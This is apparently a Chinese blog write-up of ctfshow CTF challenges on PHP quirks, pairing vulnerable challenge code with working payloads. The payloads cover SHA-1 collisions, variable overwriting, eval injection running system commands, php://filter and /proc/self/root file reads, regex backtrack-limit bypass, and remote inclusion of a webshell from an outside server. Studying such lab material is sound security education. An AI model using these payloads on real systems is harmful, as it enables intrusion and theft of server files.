php特性<2>--ctfshow

最新推荐文章于 2024-08-01 07:24:50 发布
最新推荐文章于 2024-08-01 07:24:50 发布
阅读量2.1k 收藏
点赞数 1
分类专栏: CTF训练日记 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/unexpectedthing/article/details/121088037
版权

文章目录

1.sha1的绕过

web104,106

highlight_file(__FILE__);
include("flag.php");

if(isset($_POST['v1']) && isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2) && $v1!=$v2){
        echo $flag;
    }
}

利用了sha1弱类型比较,跟MD5加密是一样的

利用数组绕过或者弱类型绕过

payload

GET:v2[]=1
POST:v1[]=2
还有一些字符串
aaroZmOk
aaK1STfY
aaO8zKZF
aa3OFF9m

如果是强类型转换

if(sha1($v1)===sha1($v2) && $v1!=$v2){
        echo $flag;
    }
使用数组绕过,v1[]=1&v2[]=2

但是还有一种,直接把数组过滤了

if(is_array($_GET['name']) || is_array($_GET['password']))
        die('There is no way you can sneak me, young man!');
 else if (sha1($_GET['name']) === sha1($_GET['password']))
      	echo $flag;

我们不能用数组了

还有一种payload

name=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1
&password=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1

2.php变量覆盖

web105

highlight_file(__FILE__);
include('flag.php');
error_reporting(0);
$error='你还想要flag嘛?';
$suces='既然你想要那给你吧!';
foreach($_GET as $key => $value){
    if($key==='error'){
        die("what are you doing?!");
    }
    $$key=$$value;
}foreach($_POST as $key => $value){
    if($value==='flag'){
        die("what are you doing?!");
    }
    $$key=$$value;
}
if(!($_POST['flag']==$flag)){
    die($error);
}
echo "your are good".$flag."\n";
die($suces);

首先审计代码,先读懂 k e y = key= key=value

<?php
$a='hello';
$$a='world';
echo $a.${$a};
?>
输出helloworld
$$a,就等于变量$hello

如果GET输入a=b, k e y = key= key=value就是将 a = a= a=b

通过die($error)出flag

GET中不能出现error,POST不能出现flag

payload

GET:a=flag
POST:error=a

通过die($suces)出flag

payload

GET:suces=flag&flag=NULL
POST:不输入东西,所以为NULL

3.parse_str的绕过

web107

highlight_file(__FILE__);
error_reporting(0);
include("flag.php");

if(isset($_POST['v1'])){
    $v1 = $_POST['v1'];
    $v3 = $_GET['v3'];
       parse_str($v1,$v2);
       if($v2['flag']==md5($v3)){
           echo $flag;
       }
}

考点parse_str

官方文档:
parse_str — 将字符串解析成多个变量
parse_str(string $string, array &$result): void
如果 stringURL 传递入的查询字符串(query string),则将它解析为变量并设置到当前作用域(如果提供了 result 则会设置到该数组里 )。
参数
string:输入的字符串。
result:如果设置了第二个变量 result, 变量将会以数组元素的形式存入到这个数组,作为替代。
没有返回值。

代码显示:
<?php
$a='p=123&q=456';
parse_str($a,$b);
echo $b['p'];
echo $b['q'];
?>
输出123456

payload

GET:v3=1
POST:v1=flag=c4ca4238a0b923820dcc509a6f75849b

4.ereg %00正则截断

web108

highlight_file(__FILE__);
error_reporting(0);
include("flag.php");

if (ereg ("^[a-zA-Z]+$", $_GET['c'])===FALSE)  {
    die('error');

}
//只有36d的人才能看到flag
if(intval(strrev($_GET['c']))==0x36d){
    echo $flag;
}
?>

考点:ereg %00正则截断

首先解析正则表达式

^[a-zA-Z]+$,表示匹配除了所有的字母的所有字符,并且匹配一次或者多次

ereg函数,在匹配到后,会返回false

正则表达式在遇到%00截断后,只会匹配%00前的东西

payload

strrev:使字符串反转
intval:将变量值整数化
36d的十进制为877
c=a%00778

5.php异常类

web109

if(isset($_GET['v1']) && isset($_GET['v2'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];

    if(preg_match('/[a-zA-Z]+/', $v1) && preg_match('/[a-zA-Z]+/', $v2)){
            eval("echo new $v1($v2());");
    }
}

羽师傅的wp:

先来看下这个正则表达式/[a-zA-Z]+/ 匹配至少有一个字母的字符串
我们使用内置类让new不报错

payload

payload:
v1=Exception();system('tac f*');//&v2=a
v1=ReflectionClass&v2=system('tac f*')

6.FilesystemIterator类的使用

web110

代码显示

highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['v1']) && isset($_GET['v2'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];

    if(preg_match('/\~|\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/', $v1)){
            die("error v1");
    }
    if(preg_match('/\~|\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/', $v2)){
            die("error v2");
    }

    eval("echo new $v1($v2());");

考点:FilesystemIterator class

在php中使用FilesystemIterator迭代器来遍历文件目录
<?php
$a=new FilesystemIterator('.');//定义一个对象
while($a->valid()){//判断文件指针是否到底了
    echo $a->getFilename().PHP_EOL;//得到文件名字
    $a->next();//指针移到下一位
}
?>
参考:https://www.php.net/manual/zh/class.filesystemiterator.php
就只需要调用对象的方法,就可以获得一些文件目录,文件创造的时间等

payload

根据代码,我们首先新建一个FilesystemIterator类来查看文件目录结构
()括号中需要传入文件路径,我们可以用../这些得到
 但是过滤了,所以使用getcwd方法来得到当前目录
?v1=FilesystemIterator&v2=getcwd得到文件路径
然后直接访问:
http://33ba02ae-bd26-41af-ae23-1d1162338f75.challenge.ctf.show:8080/fl36dga.txt

7.GLOBALS超全局变量

web111

highlight_file(__FILE__);
error_reporting(0);
include("flag.php");

function getFlag(&$v1,&$v2){
    eval("$$v1 = &$$v2;");
    var_dump($$v1);
}


if(isset($_GET['v1']) && isset($_GET['v2'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];

    if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]|\<|\>/', $v1)){
            die("error v1");
    }
    if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]|\<|\>/', $v2)){
            die("error v2");
    }
    
    if(preg_match('/ctfshow/', $v1)){
            getFlag($v1,$v2);

考点:GLOBALS超全局变量的值。

$GLOBALS — 引用全局作用域中可用的全部变量
一个包含了全部变量的全局组合数组。变量的名字就是数组的键。

<?php
$a=1;
$b=2;
var_dump($GLOBALS);
?>
输出
 'GLOBALS' =>
  &array
  'a' =>
  int(1)
  'b' =>
  int(2)

payload

?v1=ctfshow&v2=GLOBALS

8.php伪协议

WEB112

代码

highlight_file(__FILE__);
error_reporting(0);
function filter($file){
    if(preg_match('/\.\.\/|http|https|data|input|rot13|base64|string/i',$file)){
        die("hacker!");
    }else{
        return $file;
    }
}
$file=$_GET['file'];
if(! is_file($file)){
    highlight_file(filter($file));
}else{
    echo "hacker!";
} 

is_file():可以用来判断是否是一个正常的文件
is_file($filename):bool

首先代码审计,我们的目的是不能识别出是一个文件,然后通过filter的正则匹配,并且可以读取到文件

看到过滤了,data,input,想到了php伪协议filter

payload

?file=php://filter/resource=flag.php,直接读取文件
也可以使用编码来读取文件payload:file=php://filter/read=convert.quoted-printable-encode/resource=flag.php
file=compress.zlib://flag.php
payload:file=php://filter/read=convert.iconv.utf-8.utf-16le/resource=flag.php

9./proc/self/root绕过

web113

highlight_file(__FILE__);
error_reporting(0);
function filter($file){
    if(preg_match('/filter|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){
        die('hacker!');
    }else{
        return $file;
    }
}
$file=$_GET['file'];
if(! is_file($file)){
    highlight_file(filter($file));
}else{
    echo "hacker!";
}

非预期解:file=compress.zlib://flag.php

预期解:

这个题过滤了filter,所以换种方法

我们多次使用/proc/self/root来绕过

参考文章:https://www.anquanke.com/post/id/213235

payload:

file=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

10. php伪协议–filter

web114

payload

php://filter/resource=flag.php,这个就可以不用使用过滤器了。

11.trim函数的绕过+is_numeric的绕过

web115

代码

<?
function filter($num){
    $num=str_replace("0x","1",$num);
    $num=str_replace("0","1",$num);
    $num=str_replace(".","1",$num);
    $num=str_replace("e","1",$num);
    $num=str_replace("+","1",$num);
    return $num;
}
$num=$_GET['num'];
if(is_numeric($num) and $num!=='36' and trim($num)!=='36' and filter($num)=='36'){
    if($num=='36'){
        echo $flag;
    }else{
        echo "hacker!!";
    }
}else{
    echo "hacker!!!";
}

需要绕过is_numeric和trim和filter函数自定义

trim函数介绍
语法
trim(string,charlist)

参数	描述
string	        必需。规定要检查的字符串。
charlist	    可选。规定从字符串中删除哪些字符。如果省略该参数,则移除下列所有字符:

"\0"       - NULL
"\t"       - 制表符
"\n"       - 换行
"\x0B"     - 垂直制表符
"\r"       - 回车
" "        - 空格

is_numeric函数介绍:
is_numeric — 检测变量是否为数字或数字字符串

说明
is_numeric(mixed $value): bool
检测指定的变量是否为数字或数字字符串。

参数
value
需要检测的变量。

返回值
如果 value 是数字或数字字符串, 返回 true;否则返回 false。

做个测试

验证is_numeric()

for ($i=0; $i <128 ; $i++) { 
    $x=chr($i).'1';
   if(is_numeric($x)==true){
        echo urlencode(chr($i))."\n";
   }
}
输出:%09 %0A %0B %0C %0D %20 %2B + - .

验证trim函数

<?php
for ($i=0; $i <=128 ; $i++) {
    $x=chr($i).'1';
    if(trim($x)!=='1' &&  is_numeric($x)){
        echo urlencode(chr($i))."\n";
    }
}
输出:%0c + - .

然后因为filter函数

payload

num=%0c36,%0c需要放在最前面

12.gettext拓展的使用

web128

代码

<?php
error_reporting(0);
include("flag.php");
highlight_file(__FILE__);

$f1 = $_GET['f1'];
$f2 = $_GET['f2'];

if(check($f1)){
    var_dump(call_user_func(call_user_func($f1,$f2)));
}else{
    echo "嗯哼?";
}
function check($str){
    return !preg_match('/[0-9]|[a-z]/i', $str);
}

首先我们需要利用var_dump,但是check函数过滤了数字和字母

call_func_array()函数
将第一个参数作为回调函数,其余参数都作为函数来传进去

当开启了gettext()拓展后,我们使用gettext()

<?php
echo gettext("ctfshow");
//输出结果:ctfshow

echo _("ctfshow");
//输出结果:ctfshow

因此call_user_func('_','ctfshow') 返回的结果为ctfshow,接下来到第二层call_user_func,我们使用get_defined_vars函数

get_defined_vars ( void ) : array 函数返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量、服务器变量和用户定义的变量。

因为还有个call_func_array,需要函数,我们没法使用globals数组

$GLOBALS引用全局作用域中可用的全部变量(一定是全局变量)
一个包含了全部变量的全局组合数组。变量的名字就是数组的键。
例子1:
<?php
function test() {
    $foo = "local variable";

    echo '$foo in global scope: ' . $GLOBALS["foo"] . "\n";
    echo '$foo in current scope: ' . $foo . "\n";
}

$foo = "Example content";
test();
?>
$foo in global scope: Example content
$foo in current scope: local variable
如果全局变量的foo没有,函数中$GLOBALS输出不了

13.stripos()函数

web129

代码

 <?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['f'])){
    $f = $_GET['f'];
    if(stripos($f, 'ctfshow')>0){
        echo readfile($f);
    }
} 

stripos() 
查找字符串在另一字符串中第一次出现的位置(不区分大小写)。

这道题就有多个姿势

目录遍历

./ctfshow/../../../../var/www/html/flag.php  #./表示当前目录,具体多少个../需要自己慢慢尝试
/ctfshow/../var/www/html/flag.php  # /表示表示根目录

远程文件包含

在自己的服务器上写一句话木马进行利用,url为你的服务器ip或者域名,xxxx.php为你写的一句话木马

CODE
复制成功?f=http://url/xxxx.php?ctfshow

php伪协议绕过

?f=php://filter/read=convert.base64-encode|ctfshow/resource=flag.php
|ctfshow,表示多个过滤器,所以就可以绕过

14.正则最大回溯次数绕过

web130,131

代码

include("flag.php");
if(isset($_POST['f'])){
    $f = $_POST['f'];

    if(preg_match('/.+?ctfshow/is', $f)){
        die('bye!');
    }
    if(stripos($f, 'ctfshow') === FALSE){
        die('bye!!');
    }
    echo $flag;
}

首先看preg_match,匹配所有字符,包括换行符

方法1:利用最大回溯

very应该考的是正则的最大回溯

PHP 为了防止正则表达式的拒绝服务攻击(reDOS),给 pcre 设定了一个回溯次数上限 pcre.backtrack_limit
回溯次数上限默认是 100 万。如果回溯次数超过了 100 万,preg_match 将不再返回非 10,而是 false

利用python发包了

import requests
url = "http://48390078-c20a-4f56-8b4e-148df47485cb.chall.ctf.show:8080/"
data = {
    'f': 'z3eyond'*170000+'ctfshow'
}
res = requests.post(url=url,data=data)
print(res.text)

方法2:

因为数组可以绕过preg_match

payload

f[]=$ctfshow

15.&&与||的优先级

web132

先/robots.txt,再/admin

代码

include("flag.php");
highlight_file(__FILE__);


if(isset($_GET['username']) && isset($_GET['password']) && isset($_GET['code'])){
    $username = (String)$_GET['username'];
    $password = (String)$_GET['password'];
    $code = (String)$_GET['code'];

    if($code === mt_rand(1,0x36D) && $password === $flag || $username ==="admin"){
        
        if($code == 'admin'){
            echo $flag;
        }
        
    }
}

mt_rand是生成随机数

看个例子

<?php
if(false && false || true){   //也就是(flase || true)
    echo 667;
}
//输出结果:667

所以,我们只需要满足username=admin,就可以绕过第一个if

第二个if,满足code=admin

payload

?username=admin&code=admin&password=1
Z3eyOnd
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【红日Day7-CTF】parse_str函数缺陷漏洞
PZ的博客
01-13 1546
练习记录 复现代码: index.php <?php $a = "hongri"; $id = $_GET['id']; @parse_str($id); if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) { echo '<a href="flag.php">flag is here</a...
ctfshow web入门 php特性
Sentiment的博客
04-11 5358
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 5672
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
ctf中的web的PHP问题,Ctfshow Web入门 - PHP特性(89-102)
weixin_28909295的博客
04-01 1058
Web89include("flag.php");highlight_file(__FILE__);if(isset($_GET[‘num‘])){$num = $_GET[‘num‘];if(preg_match("/[0-9]/", $num)){die("no no no!");}if(intval($num)){echo $flag;}}num数组绕过?num[]=0Web90includ...
ctfshow php特性
m0_63253040的博客
08-01 328
有个正则匹配0-9数字,,输出flag的条件是要变量num为整数,直接用数组绕过就行了。
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
PHP是一种广泛使用的服务器端脚本语言,常用于构建动态网页,因此,理解PHP语法和特性对于解决这类问题至关重要。 【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码...
【WordPress插件】2022年最新版完整功能demo+插件.zip
03-31
"【WordPress插件】2022年...泰森云每天更新发布最新WordPress主题、HTML主题、WordPress插件、shopify主题、opencart主题、PHP项目源码、安卓项目源码、ios项目源码,更有超10000个资源可供选择,如有需要请站内联系。
PHP动态网站开发任务-PHP语法基础.pptx
11-14
>、<script language=“php”>…</script>、<%...%>等,但是在PHP7中,后三种标记已经被禁用。PHP代码注释格式有三种://、/*…*/、#。 3.1.1 第一个PHP程序 第一个PHP程序是指使用PHP语言编写的第一个程序,需要...
biarritz-php-2020-project1-site
04-07
先决条件按照以下示例,将此模板存储库用于WildCodeSchool组织中的新Github存储库: <campus>-<langage>-<YYMM>-<type>-<name> as bordeaux-php-1903-project2-servyy检查特拉维斯继续 。 如果您没有帐户,请注册在...
ctfshow-web41~60-WP
02-21
print('USER:python exp.py <url>') print("eg: python exp.py http://ctf.show/") print("exit: input exit in function") print("="*50) exit(0) url=argv[1] # 生成可用的字符 def write_rce(): result =...
ctfshow—PHP特性
cosmoslin的博客
09-14 2267
PHP特性 以ctfshow平台题目为例 web89 intval() 函数用于获取变量的整数值。 intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 web 90 int intval ( mixed $var [, int $base = 10 ] ) 如果 base 是 0,通过检测 var 的格式来决定使用的进制: 如果字符串包括了 “0x
ctfshow 大赛原题 web689--web695
最新发布
2301_81040377的博客
08-01 976
path这里可以写入文件这里的%26是但是如果直接写的话不能正确的绕过,必须写url形式写马方便。
php反序列化之字符逃逸
qq_53856457的博客
05-14 1650
php反序列化之字符逃逸法 1.按我的理解,反序列化的过程就是碰到;}与最前面的{配对后,便停止反序列化。如下序列化: <?php class Test { public $a = "aa"; public $b = "bbb"; public $c = "cccc"; } $qwe = new Test(); echo serialize($qwe); 输出序列化结果为:O:4:“Test”:3:{s:1:“a”;s:2:“aa”;s:1:“b”;s:3:“bbb”;s:1:“c”;
整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)
热门推荐
SetToken的博客
06-03 3万+
特别推荐的一个php一句话. 菜刀可以连接,过waf,过安全狗,D盾,360,php一句话木马带404页面,带MD5加密,可浏览器POST任意php代码执行.
php 变量覆盖 ctf,CTF-代码审计(1)——parse_str()变量覆盖
weixin_34801390的博客
03-27 739
题目连接:http://222.18.158.226:7000/iscc.php考点:parse_str()变量覆盖代码:PHP知识点:1.parse_url()参照网址:https://www.php.net/manual/zh/function.parse-url.php2.$_SERVER[]参考网址:https://php.net/manual/zh/reserved.variables....
CTF-代码审计(1)——parse_str()变量覆盖
weixin_30918415的博客
06-03 389
题目连接:http://222.18.158.226:7000/iscc.php 考点:parse_str()变量覆盖 代码: PHP知识点: 1.parse_url() 参照网址:https://www.php.net/manual/zh/function.parse-url.php 2.$_SERVER[] 参考网址:https://php.n...
ctf中php常见的考点
一个安全研究员
11-06 1万+
本博文转自:大佬博客(侵权删) 总结的很详细,忍不住转载 系统变量 123456 $_POST // 获取 post 数据,是一个字典$_GET // 获取 get 数据,是一个字典$_COOKIE // 获取 cookie$_SESSION // 获取 session$_FILE // 获取上传的文件$_REQUEST // 获取 $_GET,$_POST,$_C
ctfshow 基础补web入门PHP特性102开始
giaogiao123的博客
06-06 702
<?php highlight_file(__FILE__); $v1 = $_POST['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; $v4 = is_numeric($v2) and is_numeric($v3); if($v4){ $s = substr($v2,2); $str = call_user_func($v1,$s); echo $str; file_put_contents($v3,$str); }
PHP学习笔记
sevenlob的博客
01-27 264
PHP环境搭建 安装PHPstudy,将文本文档建立在PHPstudy的根目录之下,在浏览器中就可以查看run的结果 PHP基本结构 PHP文件的默认扩展名是php 用分号;分割语句 用$表示变量 单行注释://或# 多行注释:/* 注释 */ <?php //用分号;表示每一行结尾 ?> 输入“Hello World” 简单输出 echo和print均为输出函数 <?php ...
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>学生成绩管理系统</title> <link type="text/css" rel="stylesheet" href="css/style.css"/> //<script type="text/javascript" src="js/script.js"></script> </head> <body> <h1>学生成绩管理系统</h1> <table> <!-- 学生成绩表格--> <tr> <td><a href = "insert.php"><button>添加</button></a></td> </tr> </table> <?php require_once('./server/conn.php'); $sql = "select * from result"; $result = $conn->query($sql); if ($result->num_rows > 0) { //输出数据 while ($row = $result->fetch_assoc()) { ?> <tr> <td><?php echo $row['id'] ?></td> <td><?php echo $row['name'] ?></td> <td><?php echo $row['age'] ?></td> <td><?php echo $row['result'] ?></td> <td> <button onclick = "toUpdata(this) ">修改</button> <button onclick = "remove(this)">删除</button> </td> </tr> <?php } } $conn->close(); ?> </body> </html> 请给我找出错误
05-31
2. 在 PHP 代码中,没有将表格的 `<tr>` 标签和 `<td>` 标签放在 `<table>` 标签中。 3. 在 PHP 代码中,没有将 `<table>` 标签的闭合部分添加到代码中。 4. 在 PHP 代码中,没有将 `<tr>` 和 `<td>` 标签的闭合...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值